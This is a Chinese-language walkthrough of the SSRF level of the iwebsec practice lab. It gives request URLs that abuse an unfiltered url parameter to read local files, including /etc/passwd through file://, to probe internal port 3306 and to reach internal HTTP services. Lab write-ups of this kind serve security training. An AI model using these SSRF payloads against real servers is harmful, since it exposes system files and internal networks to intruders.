iwebsec靶场 SSRF关卡通关笔记
创始人
2024-04-03 08:30:26
0

iwebsec靶场SSRF漏洞通关笔记。

1. 源码分析

由于URL参数无经过严格的过滤,那么攻击者可以构造任意的url利用SSRF漏洞

如上所示,分析可知有SSRF漏洞

2.SSRF漏洞文件读取

(1)访问网址根目录下ssrf文件夹下的1.txt

构造SSRF漏洞访问文件的url

http://127.0.0.1/ssrf/index.php?url=http://127.0.0.1/ssrf/1.txthttp://192.168.71.131/ssrf/index.php?url=http://127.0.0.1/ssrf/1.txt

 (2)访问/etc/passwd文件

http://192.168.71.131/ssrf/index.php?url=file:///etc/passwd

 3.SSRF内网探测漏洞

利用SSRF端口探测方法,如果访问3306端口返回数据库信息(3306通常为数据库端口),就说明开启了3306端口。反之如果无数据返回或者延迟较大,说明该端口未开放。

http://192.168.71.131/ssrf/index.php?url=http://127.0.0.1:3306

如上所示3306端口返回信息,证明此端口已开放

4.SSRF内网应用攻击

 访问内网http服务

http://192.168.71.131/ssrf/index.php?url=http://127.0.0.1

相关内容

热门资讯

贵州百灵纾困纠纷背后:新希望与... 近日,苗药龙头贵州百灵(002424)与华创证券之间的纾困纠纷一直是市场关注的重点,自2025年8月...
*ST南置(002305)披露... 截至2025年12月29日收盘,*ST南置(002305)报收于2.23元,较前一交易日上涨0.9%...
原创 普... 俄罗斯总统弗拉基米尔·普京签署法律,禁止在俄罗斯境内执行外国刑事法院和国际法院的裁决 相关文件已在俄...
盒马购得面包发馊变臭!商家“仅... 面包发馊发臭 近日,市民刘女士向“新民帮侬忙”反映,从盒马鲜生购入的日式面包,竟然发馊发臭!然而事发...
当年龄不再是“免罚金牌”,彰显... 文/九派新闻特约评论员 舒圣祥 明年1月1日起,新修订的《治安管理处罚法》即将正式施行。新法专门新增...
2026年1月1日起施行!“被... 2025年新修订的治安管理处罚法将于2026年1月1日起施行,针对新修订的内容中与市民生活息息相关的...
“车企起诉电池企业第一案”:2... 编者按: 极氪起诉欣旺达这场官司,无论最终迎来怎样的判决,都注定会为整个行业留下一笔深刻的警示财富。...
逃缴1.09亿美元关税!深圳货... 可以说2025是税务大年,卖家不仅要扛住国内申报的节奏,还得适应一件更现实的事:跨境这门生意,账目和...
青岛榜样|奋战公益诉讼一线,诠... “说是检察官,其实我们更像户外工作者,经常跋山涉水、穿梭于田野乡间,哪里有公益受损和群众需求,哪里就...
双星新材(002585)披露市... 截至2025年12月29日收盘,双星新材(002585)报收于6.82元,较前一交易日上涨1.04%...